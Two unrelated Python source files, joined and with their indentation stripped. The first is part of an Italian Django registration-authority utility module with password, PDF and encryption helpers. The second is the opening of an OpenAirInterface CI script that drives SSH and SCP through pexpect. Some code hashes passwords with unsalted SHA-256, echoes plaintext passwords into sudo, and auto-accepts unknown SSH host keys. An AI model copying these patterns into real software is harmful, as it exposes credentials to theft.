op = get_operator_by_username(params['username'])
if 'timestamp' in params:
timestamp_to_datetime = datetime.datetime.strptime(params['timestamp'], '%Y-%m-%d %H:%M')
token_expiration_datetime = from_utc_to_local(timestamp_to_datetime) + datetime.timedelta(days=30)
token_expiration_datetime = token_expiration_datetime.strftime('%d/%m/%Y %H:%M')
else:
token_expiration_datetime = None
context_dict = {
'pagesize': 'A4',
'RAO_name': get_attributes_RAO().name,
'operator': op,
'token_expiration_date': token_expiration_datetime
}
if passphrase:
context_dict['passphrase'] = passphrase
context_dict['pdf_object'] = params['pdf_object'] if 'pdf_object' in params else ""
context_dict['name_user'] = params['name_user'] if 'name_user' in params else ""
context_dict['surname_user'] = params['surname_user'] if 'surname_user' in params else ""
template = get_template(settings.TEMPLATE_URL_PDF + 'pdf_template.html')
else:
context_dict['pin'] = pin
template = get_template(settings.TEMPLATE_URL_PDF + 'pdf_pin_template.html')
html = template.render(context_dict)
result = BytesIO()
pdf = pisa.pisaDocument(BytesIO(html.encode("ISO-8859-1")), result)
cf_user = params['fiscalNumber'] if passphrase else params['username']
if not pdf.err:
LOG.info("{} - PDF scaricato".format(cf_user), extra=set_client_ip())
filename = params['id'] + ".pdf" if passphrase else params['operator'] + ".pdf"
response = HttpResponse(result.getvalue(), content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename=' + filename
return response
LOG.warning("{} - PDF non scaricato - download automatico non riuscito".format(cf_user), extra=set_client_ip())
return Exception()
def date_converter(date_with_slash):
"""
Converte una data dal formato dd/mm/YYYY a YYYY-mm-dd
:param date_with_slash: data in formato dd/mm/YYYY
:return: data in formato YYYY-mm-dd
"""
date_object = datetime.datetime.strptime(date_with_slash, '%d/%m/%Y')
return date_object.strftime('%Y-%m-%d')
def from_utc_to_local(utc_datetime):
"""
Converte una datetime utc in un datetime locale
:param utc_datetime: datetime in uct
:return: datetime locale
"""
local_date = utc_datetime.replace(tzinfo=tz.tzutc())
local_date = local_date.astimezone(tz.tzlocal())
return local_date
def capitalize_text(text):
"""
Converte una stringa in miniscolo con le iniziali in maiuscolo
:param text: stringa da convertire
:return: stringa convertita
"""
array_string = text.lower().split(' ')
for i, tmp_name in enumerate(array_string):
array_string[i] = tmp_name.capitalize()
return ' '.join(array_string)
def check_ts(number):
"""
Verifica la validità del codice di identificazione della tessera sanitaria
:param number: codice di identificazione da verificare
:return: True/False
"""
if not number.isdigit():
return False
if len(number) != 20:
return False
if number[0:5] != "80380":
return False
even = [sum([int(digit) for digit in str(int(x) * 2)]) for x in number[-2::-2]]
odd = [int(x) for x in number[-1::-2]]
tot = sum(map(add, even, odd))
if tot % 10 != 0:
return False
return True
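# Worked sketch of the checksum above (Luhn-style): starting from the right, every second digit is
# doubled and the digits of the doubled value are summed (e.g. 7 -> 14 -> 1 + 4 = 5), the remaining
# digits are added as-is, and the code is accepted only if the grand total is a multiple of 10,
# the code is 20 digits long and it starts with "80380".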
def delete_session_key(request):
"""
Cancellazione chiave di sessione
:param request: request
:return:
"""
try:
key_name = request.GET.get('key_name')
if key_name and key_name in request.session:
del request.session[key_name]
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip(request))
return HttpResponse("Chiave Cancellata")
def load_select(request):
"""
Caricamento dinamico select.
:param request: request
"""
code = request.GET.get('code')
try:
if request.GET.get('select') == 'placeOfBirth':
if request.GET.get('birth_date') and str(request.GET.get('is_form')) == 'false':
data = AddressMunicipality.objects.filter(city__code=code,
dateStart__lt=request.GET.get('birth_date'),
dateEnd__gt=request.GET.get('birth_date')).order_by('name')
else:
data = AddressMunicipality.objects.filter(city__code=code).order_by('name')
return render(request, settings.TEMPLATE_URL_AGENCY + 'dropdown_options.html',
{'list': data, 'municipality': True})
elif request.GET.get('select') == 'addressMunicipality':
data = AddressMunicipality.objects.filter(city__code=code,
dateEnd__gt=datetime.date.today()).order_by('name')
return render(request, settings.TEMPLATE_URL_AGENCY + 'dropdown_options.html',
{'list': data, 'municipality': False})
elif (request.GET.get('select') == 'countyOfBirth' or request.GET.get(
'select') == 'addressCountry') and request.GET.get('code') == "Z000":
data = AddressCity.objects.all().order_by('name')
elif request.GET.get('select') == 'nationOfBirth':
data = AddressNation.objects.all().order_by('name')
elif request.GET.get('select') == 'addressNation':
data = AddressNation.objects.all().exclude(code__in=SUPRESSED_COUNTRY)
else:
data = None
except Exception as e:
LOG.error("Exception: {}".format(str(e)), extra=set_client_ip(request))
return render(request, settings.TEMPLATE_URL_AGENCY + 'error.html',
{"statusCode": StatusCode.EXC.value, "message": "Errore durante il caricamento della Select"})
return render(request, settings.TEMPLATE_URL_AGENCY + 'dropdown_options.html', {'list': data})
def page_manager(current_page, list_view, entry_view=settings.ENTRY_FOR_PAGE):
"""
Data una lista e la pagina attuale, restituisce un dizionario per la gestione del relativo paginator
:param current_page: pagina della lista visualizzata
:param list_view: elenco da visualizzare (es. operator/request_identity)
:param entry_view: num. di entry da visualizzare per pagina (di default 5)
:return: dizionario con num. di pagina prec./attuale/succ. + entry da visualizzare
"""
if list_view is None:
pages = {
'current': 1,
'previous': None,
'next': None,
'entries': list_view
}
return pages
count_all_entries = list_view.count()
first_entry = entry_view * (int(current_page) - 1)
last_entry = entry_view * int(current_page)
max_n_page = count_all_entries / entry_view if count_all_entries % entry_view == 0 else (count_all_entries /
entry_view) + 1
pages = {
'current': int(current_page),
'previous': int(current_page) - 1 if int(current_page) - 1 > 0 else None,
'next': int(current_page) + 1 if int(current_page) + 1 <= int(max_n_page) else None,
'entries': list_view[first_entry:last_entry]
}
return pages
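# Hypothetical usage sketch (values are illustrative, not from the project): with entry_view=5 and
# a queryset of 12 operators, page_manager(2, operators) returns
# {'current': 2, 'previous': 1, 'next': 3, 'entries': operators[5:10]}; on page 3 'next' becomes
# None because 12 entries at 5 per page give 3 pages.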
def check_password(username, password, status, request=None):
"""
Verifica se l'operatore esiste, è attivo e se la pass è errata/scaduta
:param request: request
:param username: codiceFiscale/username dell'operatore
:param password: password dell'operatore
:param status: status dell'operatore
:return: StatusCode
"""
hash_pass_insert = hashlib.sha256(password.encode()).hexdigest()
user = Operator.objects.filter(fiscalNumber=username.upper(), status=status).last()
if user:
if not user.signStatus:
return StatusCode.SIGN_NOT_AVAILABLE.value
hash_pass = user.password
try:
jwt.decode(hash_pass, hash_pass_insert)
return StatusCode.OK.value
except jwt.ExpiredSignatureError:
return StatusCode.EXPIRED_TOKEN.value
except jwt.InvalidSignatureError:
return StatusCode.ERROR.value
except Exception as e:
LOG.warning('[{}] eccezione durante la verifica della password: {}'.format(username, e),
extra=set_client_ip(request))
return StatusCode.EXC.value
def check_operator(username, password, request=None):
"""
Verifica se l'operatore esiste, è attivo e se la pass è errata/scaduta
:param request: request
:param username: codiceFiscale/username dell'operatore
:param password: password dell'operatore
:return: StatusCode
"""
hash_pass_insert = hashlib.sha256(password.encode()).hexdigest()
user = Operator.objects.filter(fiscalNumber=username.upper()).last()
if user:
if not user.status:
return StatusCode.UNAUTHORIZED.value
hash_pass = user.password
try:
jwt.decode(hash_pass, hash_pass_insert)
user.failureCounter = 0
user.save()
if not user.signStatus and user.isActivated:
return StatusCode.FORBIDDEN.value
elif not user.signStatus and not user.isActivated:
return StatusCode.SIGN_NOT_AVAILABLE.value
return StatusCode.OK.value
except jwt.ExpiredSignatureError:
return StatusCode.EXPIRED_TOKEN.value
except jwt.InvalidSignatureError:
user.failureCounter += 1
user.failureTimestamp = datetime.datetime.utcnow()
if user.failureCounter >= 3:
user.status = False
user.save()
LOG.warning("{} - Credenziali errate, Utente bloccato".format(username), extra=set_client_ip(request))
return StatusCode.UNAUTHORIZED.value
else:
LOG.warning("{} - Credenziali errate".format(username), extra=set_client_ip(request))
user.save()
return StatusCode.ERROR.value
except Exception as e:
LOG.warning('[{}] eccezione durante la verifica della password: {}'.format(username, e),
extra=set_client_ip(request))
return StatusCode.EXC.value
return StatusCode.NOT_FOUND.value
def is_admin(username):
"""
Verifica se l'operatore ha il ruolo "ADMIN" ed è attivo
:param username: email/username dell'operatore
:return: True/False
"""
user = Operator.objects.filter(fiscalNumber=username, idRole__role=RoleTag.ADMIN.value, status=True).last()
if user:
return True
else:
return False
def display_alert(alert_type, body_message, link_message=None, link=None):
"""
Genera un messaggio di errore/successo
:param alert_type: enum AlertType: info, warning, success o danger
:param body_message: testo del messaggio da mostrare
:param link_message:
:param link:
:return: lista di dict con campi 'tags' e 'body'
"""
return [{'tags': alert_type.value, 'body': body_message, 'link_message': link_message, 'link': link}]
def get_certificate(crt):
"""
Converte in stringa il certificato in input
:param crt: certificato
:return: stringa convertita
"""
try:
cert = ''
for chunk in crt.chunks():
cert = cert + chunk.decode('UTF-8')
return cert
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip())
return
def get_city_id(municipality_value, bith_date):
"""
Riceve in input il codice catastale del comune di nascita e la data di nascita, dai quali risalire alla
città di nascita
:param municipality_value: codice catastale del comune di nascita
:param bith_date: data di nascita in formato YYYY-mm-dd
:return: StatusCode e sigla della città di nascita
"""
try:
municipality = AddressMunicipality.objects.filter(code=municipality_value, dateStart__lt=bith_date,
dateEnd__gt=bith_date).first()
if municipality is not None:
city = municipality.city
return StatusCode.OK.value, city.code
return StatusCode.ERROR.value, None
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip())
return StatusCode.EXC.value, None
def decode_fiscal_number(request):
"""
Estrae i dati a partire dal codice fiscale
:return: JsonResponse con statusCode e dati (in caso di successo)
"""
cf = request.GET.get('CF').upper()
try:
isvalid = codicefiscale.is_valid(cf) or codicefiscale.is_omocode(cf)
decode_cf = codicefiscale.decode(cf)
if isvalid:
am = AddressMunicipality.objects.filter(code__iexact=decode_cf['birthplace']['code']).first()
if am:
nation_code = 'Z000'
else:
nation_code = decode_cf['birthplace']['code']
return JsonResponse({'statusCode': StatusCode.OK.value,
'codeOfNation': nation_code,
'placeOfBirth': '',
'countyOfBirth': '',
'dateOfBirth': decode_cf['birthdate'].strftime('%d/%m/%Y'),
'gender': decode_cf['sex']
})
StatusCode_city, city = get_city_id(decode_cf['birthplace']['code'], decode_cf['birthdate'].strftime('%Y-%m-%d'))
if StatusCode_city == 200:
return JsonResponse({'statusCode': StatusCode.OK.value,
'codeOfNation': nation_code,
'placeOfBirth': decode_cf['birthplace']['code'],
'countyOfBirth': city,
'dateOfBirth': decode_cf['birthdate'].strftime('%d/%m/%Y'),
'gender': decode_cf['sex']
})
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip(request))
return JsonResponse({'statusCode': StatusCode.EXC.value})
return JsonResponse({'statusCode': StatusCode.ERROR.value})
def format_id_card_issuer(id_card_issuer):
"""
Rimuove le preposizioni dall'ente di rilascio del documento
:param id_card_issuer: comune/nome ente di rilascio
:return: stringa con preposizioni rimosse
"""
exclusions = ['di', 'delle', 'e', 'a', 'con', 'da', 'su', 'tra', 'fra']
exclusions = '|'.join(['\\b%s\\b' % x for x in exclusions])
id_card_issuer = re.sub(exclusions, '', id_card_issuer)
id_card_issuer = id_card_issuer.replace('dell\'', '').replace('d\'', '')
id_card_issuer = re.sub(r'\s+', '', id_card_issuer)
return id_card_issuer[0].lower() + id_card_issuer[1:]
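# Illustrative example of the normalisation above (the value is hypothetical): "Comune di Roma"
# becomes "comuneRoma"; the preposition "di" is dropped, whitespace is removed and the first
# character is lower-cased.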
def encrypt_data(payload, passphrase):
"""
Crypta un payload in ingresso utilizzando la passphrase inserita
:param payload: oggetto da cryptare
:param passphrase: password da utilizzare per l'encrypt
:return: payload cryptato
"""
try:
if type(passphrase) == bytes:
hash_passphrase = hashlib.sha512(passphrase).digest()
else:
hash_passphrase = hashlib.sha512(passphrase.encode()).digest()
key_base64 = base64.urlsafe_b64encode(hash_passphrase)
kjs = json.dumps({'k': key_base64.decode('utf-8', 'strict'), 'kty': 'oct'})
key = jwk.JWK.from_json(kjs)
token = jwe.JWE(payload, json_encode({"alg": "dir", "enc": "A256CBC-HS512"}))
token.add_recipient(key)
return token.serialize(compact=True)
except Exception as e:
LOG.warning("Exception: {}".format(str(e)), extra=set_client_ip())
return None
def decrypt_data(encrypted_data, passphrase):
"""
Decrypta un payload in ingresso utilizzando la passphrase inserita
:param encrypted_data: payload cryptato da decryptare
:param passphrase: password da utilizzare per il decrypt
:return: payload decryptato
"""
try:
if type(passphrase) == bytes:
hash_passphrase = hashlib.sha512(passphrase).digest()
else:
hash_passphrase = hashlib.sha512(passphrase.encode()).digest()
key_base64 = base64.urlsafe_b64encode(hash_passphrase)
kjs = json.dumps({'k': key_base64.decode('utf-8', 'strict'), 'kty': 'oct'})
key = jwk.JWK.from_json(kjs)
jwetoken = jwe.JWE()
jwetoken.deserialize(encrypted_data, key=key)
return jwetoken.payload.decode()
except Exception as e:
LOG.error("Exception: {}".format(str(e)), extra=set_client_ip())
return None
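# Hedged round-trip sketch for the two helpers above: the key is derived deterministically from the
# passphrase (SHA-512, then base64), so, assuming jwcrypto behaves as imported at the top of this
# module, something like
#   token = encrypt_data('secret payload', 'my-passphrase')
#   decrypt_data(token, 'my-passphrase')   # expected to return 'secret payload'
# should recover the original text, while a wrong passphrase makes deserialize() fail and the
# function return None.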
def do_import(task_id, request):
"""
Task in background eseguito per effettuare l'import dei dati
"""
from agency.utils.utils_setup import init_nation, init_prefix, init_county, init_municipality, init_user
task = SetupTask.objects.get(pk=task_id)
try:
init_nation(None)
task.percentage = 15
task.save()
init_prefix(None)
task.percentage = 33
task.save()
init_county(None)
task.percentage = 66
task.save()
init_municipality(None)
task.percentage = 99
task.save()
init_user(request)
task.status = 'completed'
task.percentage = 100
task.save()
except Exception as e:
task.status = 'failed'
task.error = str(e)
task.save()
def check_import(request):
"""
Verifica lo stato di completamento del task in background
"""
task = SetupTask.objects.first()
if task.status == 'completed':
LOG.info("Setup completato con successo.", extra=set_client_ip(request))
elif task.status == 'failed':
LOG.error("Errore durante il caricamento dati.", extra=set_client_ip(request))
return JsonResponse({
'statusCode': StatusCode.OK.value,
'status': task.status,
'percentage': task.percentage,
'error': task.error
})
def start_import(request):
"""
Avvia il processo di setup dei dati in background
"""
if SetupTask.objects.count() == 0:
task = SetupTask()
task.status = 'in_progress'
task.percentage = 0
task.error = ''
task.save()
t = threading.Thread(target=do_import, args=[task.id, request])
t.daemon = True  # setDaemon() is deprecated; the daemon attribute is equivalent
t.start()
return JsonResponse({'statusCode': StatusCode.OK.value})
else:
last_row = SetupTask.objects.last()
if last_row.status == "failed":
last_row.delete()
return start_import(request)
return JsonResponse({'statusCode': StatusCode.OK.value})
|
main.py
|
# /*
# * Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
# * contributor license agreements. See the NOTICE file distributed with
# * this work for additional information regarding copyright ownership.
# * The OpenAirInterface Software Alliance licenses this file to You under
# * the OAI Public License, Version 1.1 (the "License"); you may not use this file
# * except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.openairinterface.org/?page_id=698
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# *-------------------------------------------------------------------------------
# * For more information about the OpenAirInterface (OAI) Software Alliance:
# * contact@openairinterface.org
# */
#---------------------------------------------------------------------
# Python for CI of OAI-eNB + COTS-UE
#
# Required Python Version
# Python 3.x
#
# Required Python Package
# pexpect
#---------------------------------------------------------------------
#-----------------------------------------------------------
# Version
#-----------------------------------------------------------
Version = '0.1'
#-----------------------------------------------------------
# Constants
#-----------------------------------------------------------
ALL_PROCESSES_OK = 0
ENB_PROCESS_FAILED = -1
ENB_PROCESS_OK = +1
ENB_PROCESS_SEG_FAULT = -11
ENB_PROCESS_ASSERTION = -12
ENB_PROCESS_REALTIME_ISSUE = -13
ENB_PROCESS_NOLOGFILE_TO_ANALYZE = -14
ENB_PROCESS_SLAVE_RRU_NOT_SYNCED = -15
HSS_PROCESS_FAILED = -2
HSS_PROCESS_OK = +2
MME_PROCESS_FAILED = -3
MME_PROCESS_OK = +3
SPGW_PROCESS_FAILED = -4
SPGW_PROCESS_OK = +4
UE_IP_ADDRESS_ISSUE = -5
OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE = -20
OAI_UE_PROCESS_COULD_NOT_SYNC = -21
OAI_UE_PROCESS_ASSERTION = -22
OAI_UE_PROCESS_FAILED = -23
OAI_UE_PROCESS_NO_TUNNEL_INTERFACE = -24
OAI_UE_PROCESS_OK = +6
UE_STATUS_DETACHED = 0
UE_STATUS_DETACHING = 1
UE_STATUS_ATTACHING = 2
UE_STATUS_ATTACHED = 3
X2_HO_REQ_STATE__IDLE = 0
X2_HO_REQ_STATE__TARGET_RECEIVES_REQ = 1
X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE = 2
X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ = 3
X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK = 10
#-----------------------------------------------------------
# Import
#-----------------------------------------------------------
import sys # arg
import re # reg
import pexpect # pexpect
import time # sleep
import os
import subprocess
import xml.etree.ElementTree as ET
import logging
import datetime
import signal
from multiprocessing import Process, Lock, SimpleQueue
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(name)s:%(levelname)s: %(message)s"
)
#-----------------------------------------------------------
# Class Declaration
#-----------------------------------------------------------
class SSHConnection():
def __init__(self):
self.prematureExit = False
self.ranRepository = ''
self.ranBranch = ''
self.ranAllowMerge = False
self.ranCommitID = ''
self.ranTargetBranch = ''
self.eNBIPAddress = ''
self.eNBUserName = ''
self.eNBPassword = ''
self.eNBSourceCodePath = ''
self.EPCIPAddress = ''
self.EPCUserName = ''
self.EPCPassword = ''
self.eNB1IPAddress = ''
self.eNB1UserName = ''
self.eNB1Password = ''
self.eNB1SourceCodePath = ''
self.eNB2IPAddress = ''
self.eNB2UserName = ''
self.eNB2Password = ''
self.eNB2SourceCodePath = ''
self.EPCSourceCodePath = ''
self.EPCType = ''
self.EPC_PcapFileName = ''
self.ADBIPAddress = ''
self.ADBUserName = ''
self.ADBPassword = ''
self.testCase_id = ''
self.testXMLfiles = []
self.nbTestXMLfiles = 0
self.desc = ''
self.Build_eNB_args = ''
self.backgroundBuild = False
self.backgroundBuildTestId = ['', '', '']
self.Initialize_eNB_args = ''
self.eNB_instance = ''
self.eNB_serverId = ''
self.eNBLogFiles = ['', '', '']
self.eNBOptions = ['', '', '']
self.ping_args = ''
self.ping_packetloss_threshold = ''
self.iperf_args = ''
self.iperf_packetloss_threshold = ''
self.iperf_profile = ''
self.nbMaxUEtoAttach = -1
self.UEDevices = []
self.UEDevicesStatus = []
self.CatMDevices = []
self.UEIPAddresses = []
self.htmlFile = ''
self.htmlHeaderCreated = False
self.htmlFooterCreated = False
self.htmlUEConnected = -1
self.htmleNBFailureMsg = ''
self.htmlUEFailureMsg = ''
self.picocom_closure = False
self.idle_sleep_time = 0
self.x2_ho_options = 'network'
self.x2NbENBs = 0
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.htmlTabRefs = []
self.htmlTabNames = []
self.htmlTabIcons = []
self.repeatCounts = []
self.finalStatus = False
self.OsVersion = ''
self.KernelVersion = ''
self.UhdVersion = ''
self.UsrpBoard = ''
self.CpuNb = ''
self.CpuModel = ''
self.CpuMHz = ''
self.UEIPAddress = ''
self.UEUserName = ''
self.UEPassword = ''
self.UE_instance = ''
self.UESourceCodePath = ''
self.UELogFile = ''
self.Build_OAI_UE_args = ''
self.Initialize_OAI_UE_args = ''
self.flexranCtrlInstalled = False
self.flexranCtrlStarted = False
self.expectedNbOfConnectedUEs = 0
def open(self, ipaddress, username, password):
count = 0
connect_status = False
while count < 4:
self.ssh = pexpect.spawn('ssh', [username + '@' + ipaddress], timeout = 5)
self.sshresponse = self.ssh.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', 'Last login', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
self.ssh.sendline('yes')
self.ssh.expect('password:')
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 1:
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 2:
# Checking if we are really on the remote client defined by its IP address
self.command('stdbuf -o0 ifconfig | egrep --color=never "inet addr:"', '\$', 5)
result = re.search(str(ipaddress), str(self.ssh.before))
if result is None:
self.close()
else:
count = 10
connect_status = True
else:
# debug output
logging.debug(str(self.ssh.before))
logging.debug('self.sshresponse = ' + str(self.sshresponse))
# add a short delay before retrying after a failure
if not connect_status:
time.sleep(1)
count += 1
if connect_status:
pass
else:
sys.exit('SSH Connection Failed')
def command(self, commandline, expectedline, timeout):
logging.debug(commandline)
self.ssh.timeout = timeout
self.ssh.sendline(commandline)
self.sshresponse = self.ssh.expect([expectedline, pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
return 0
elif self.sshresponse == 1:
logging.debug('\u001B[1;37;41m Unexpected EOF \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
elif self.sshresponse == 2:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
result = re.search('ping |iperf |picocom', str(commandline))
if result is None:
logging.debug(str(self.ssh.before))
sys.exit(self.sshresponse)
else:
return -1
else:
logging.debug('\u001B[1;37;41m Unexpected Others \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
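# Added note: command() returns 0 when the expected pattern is matched; a TIMEOUT is tolerated
# (returning -1) only for long-running ping/iperf/picocom commands, and any other EOF or TIMEOUT
# terminates the script via sys.exit().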
def close(self):
self.ssh.timeout = 5
self.ssh.sendline('exit')
self.sshresponse = self.ssh.expect([pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
pass
elif self.sshresponse == 1:
if not self.picocom_closure:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT during closing\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Unexpected Others during closing\u001B[0m')
def copyin(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination)
while count < 10:
scp_spawn = pexpect.spawn('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# add a short delay before retrying after a failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
return 0
else:
return -1
def copyout(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination)
while count < 4:
scp_spawn = pexpect.spawn('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# add a short delay before retrying after a failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
pass
else:
sys.exit('SCP failed')
def BuildeNB(self):
if self.ranRepository == '' or self.ranBranch == '' or self.ranCommitID == '':
Usage()
sys.exit('Insufficient Parameter')
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
self.command('mkdir -p ' + lSourcePath, '\$', 5)
self.command('cd ' + lSourcePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.ranRepository + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
# Raphael: here add a check if git clone or git fetch went smoothly
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
# Checking the BUILD INFO file
if not self.backgroundBuild:
self.command('ls *.txt', '\$', 5)
result = re.search('LAST_BUILD_INFO', str(self.ssh.before))
if result is not None:
mismatch = False
self.command('grep SRC_COMMIT LAST_BUILD_INFO.txt', '\$', 2)
result = re.search(self.ranCommitID, str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep MERGED_W_TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
result = re.search('YES', str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
result = re.search('develop', str(self.ssh.before))
else:
result = re.search(self.ranTargetBranch, str(self.ssh.before))
if result is None:
mismatch = True
else:
result = re.search('NO', str(self.ssh.before))
if result is None:
mismatch = True
if not mismatch:
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
return
self.command('echo ' + lPassWord + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.ranCommitID != '':
self.command('git checkout -f ' + self.ranCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already have been checked earlier
if (self.ranAllowMerge):
if self.ranTargetBranch == '':
if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
self.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
# no need to clean the log directory (git clean already did that)
if self.backgroundBuild:
self.command('echo "./build_oai ' + self.Build_eNB_args + '" > ./my-lte-softmodem-build.sh', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-build.sh', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S -E daemon --inherit --unsafe --name=build_enb_daemon --chdir=' + lSourcePath + '/cmake_targets -o ' + lSourcePath + '/cmake_targets/compile_oai_enb.log ./my-lte-softmodem-build.sh', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
self.backgroundBuildTestId[int(self.eNB_instance)] = self.testCase_id
return
self.command('stdbuf -o0 ./build_oai ' + self.Build_eNB_args + ' 2>&1 | stdbuf -o0 tee compile_oai_enb.log', 'Bypassing the Tests|build have failed', 1500)
self.checkBuildeNB(lIpAddr, lUserName, lPassWord, lSourcePath, self.testCase_id)
def WaitBuildeNBisFinished(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
count = 40
buildOAIprocess = True
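		# Poll every 30 seconds (up to 40 times, i.e. roughly 20 minutes) until the build_oai process disappears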
while (count > 0) and buildOAIprocess:
self.command('ps aux | grep --color=never build_ | grep -v grep', '\$', 3)
